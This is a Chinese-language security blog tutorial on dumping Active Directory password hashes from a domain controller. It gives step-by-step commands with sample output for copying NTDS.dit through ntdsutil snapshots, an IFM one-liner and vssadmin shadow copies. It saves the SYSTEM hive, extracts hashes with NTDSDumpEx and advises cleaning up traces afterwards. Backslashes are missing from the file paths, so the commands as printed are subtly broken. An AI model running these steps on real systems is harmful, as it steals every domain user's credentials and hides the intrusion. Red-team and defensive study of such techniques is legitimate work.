轉儲域密碼哈希值
- 2019 年 10 月 5 日
- 筆記
No.1
聲明
由於傳播、利用此文所提供的信息而造成的任何直接或者間接的後果及損失,均由使用者本人負責,雷神眾測以及文章作者不為此承擔任何責任。 雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用於商業目的。
No.2
前言
域用戶的哈希值存儲在域管服務器的NTDS.DIT的數據庫文件中,除此之外還有用戶信息和組成員信息。NTDS.dit文件無法直接複製到其他位置進行離線破解和提取(類似於本地存儲的SYSTEM),其存儲位置為:
C:WindowsNTDSNTDS.dit
本文主要介紹利用域管理服務器命令提取NTDS.dit文件,後續還會有其他工具的使用方法。
No.3
Ntdsutil快照
該工具域環境默認安裝[Windows 2003 及以上]
查看當前快照列表
C:UsersAdministrator>ntdsutil snapshot "list all" quit quitntdsutil: snapshot快照: list all
找不到快照。
快照: quit
ntdsutil: quit
創建快照
C:UsersAdministrator>ntdsutil snapshot "activate instance ntds" create quit quitntdsutil: snapshot
快照: activate instance ntds
活動實例設置為「ntds」。
快照: create
正在創建快照…
成功生成快照集 {550f5e34-1952-475b-99ef-30ba80014363}。
快照: quit
ntdsutil
註:其中快照的guid需要取出來,掛載快照時使用
掛載快照
C:UsersAdministrator>ntdsutil snapshot "mount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit
ntdsutil: snapshot
快照: mount {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd}
已作為 C:$SNAP_201810172200_VOLUMEC$ 裝載快照: quit
ntdsutil: quit
註:機器中有幾塊硬盤,那麼就會生成幾個快照分區,快照分區會以$SNAP_時間_VOLUME{分區名}$進行命名
尋找ntds.dit
一般情況下會在c:windowsntds 目錄下
註:注意看時間,一定要最近日期的,有一些域控機器上的ntds.dit很古老,那麼可能是備份到其他目錄下了,需要再找一下,可能…還會遇到磁盤空間不足的情況,自行斟酌。
拷貝ntds.dit
C:UsersAdministrator>copy C:$SNAP_201810172200_VOLUMEC$WindowsNTDSntds.dit c:windowstemp
已複製 1 個文件。
卸載快照
C:UsersAdministrator>ntdsutil snapshot "unmount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit
ntdsutil: snapshot
快照: unmount {550f5e34-1952-475b-99ef-30ba80014363}
快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已卸載。
快照: quit
ntdsutil: quit
刪除快照
C:UsersAdministrator>ntdsutil snapshot "delete {550f5e34-1952-475b-99ef-30ba80014363}" quit quit
ntdsutil: snapshot
快照: delete {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已刪除。
快照: quit
ntdsutil: quit
獲取註冊表中的system文件
C:UsersAdministrator>reg save HKLMSYSTEM c:windowstempsystem.hiv
操作成功完成。
通過NtdsDumpex.exe提取域用戶hash
C:UsersAdministrator>c:windowstempNTDSDumpEx.exe -d c:windowstempntds.dit -s c:windowstempsystem.hiv -o c:windowstemphash.txt -hntds.dit hashes off-line dumper v0.3.Part of GMH's fuck Tools,Code by zcgonvh.
[+]use hive file: c:windowstempsystem.hiv
[+]SYSKEY = 09135AC2D70C07F0984CF71599F7D947
[+]PEK version: 2k3
[+]PEK = 57C4CDE20126F6BE8B6FFE5649178339
[+]dump completed in 0.172 seconds.
註:這裡hash.txt就是我們想要的用戶hash
拷貝hash
全部結束之後記得清理現場
小福利:一句話版本
ntdsutil "ac in ntds" "ifm" "cr fu c:windowstemptemp" q q
No.4
VSSADMIN卷影副本
卷影副本是Windows命令行一種即便被操作系統使用也能夠用於管理員備份計算機,卷,文件的實用程序。卷影複製作為服務運行,並要求將文件系統格式化為NTFS,默認情況在所有現代操作系統下都是如此。從Windows命令提示符執行以下操作將創建C:驅動器盤的快照,以便用戶訪問通常無法訪問這些文件,並將其其複製到另一個位置(本地文件夾,網絡文件夾或可移動介質)。
註:要有管理員權限
查看卷影列表:
C:UsersAdministrator>vssadmin list shadowsvssadmin 1.1 – 卷影複製服務管理命令行工具(C) 版權所有 2001-2005 Microsoft Corp. 卷影副本集 ID: {9ddcbac4-00c2-4383-add4-abb96e190399} 的內容
在創建時間: 2018/9/7 22:48:01 含有 1 個卷影副本 卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}
原始卷: (C:)\?Volume{f73dd843-9b04-11e8-99c6-806e6f6e6963}
卷影副本卷: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1 源起機器: WIN-1O417SEMSD5.test.com
服務機器: WIN-1O417SEMSD5.test.com
提供程序: 'Microsoft Software Shadow Copy provider 1.0'
類型: ClientAccessible
屬性: 持續, 客戶端可問
創建卷影列表:
C:UsersAdministrator>vssadmin create shadow /for=c:vssadmin 1.1 – 卷影複製服務管理命令行工具
(C) 版權所有 2001-2005 Microsoft Corp.
成功地創建了 'c:' 的卷影副本
卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}
卷影副本卷名: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
獲取NDTS.dit和SYSTEM:
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSNTDS.dit C:temp
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:temp
C:UsersAdministrator>copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSNTDS.dit C:temp
已複製 1 個文件。
C:UsersAdministrator>copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:temp
已複製 1 文件。
刪除卷影列表:
C:UsersAdministrator>vssadmin Delete Shadows /For=C:vssadmin 1.1 – 卷影複製服務管理命令行工具
(C) 版權所有 2001-2005 Microsoft Corp.
確實要刪除 1 卷影副本嗎(Y/N): [N]? Y
成功地刪了
打包拷貝!Get
END
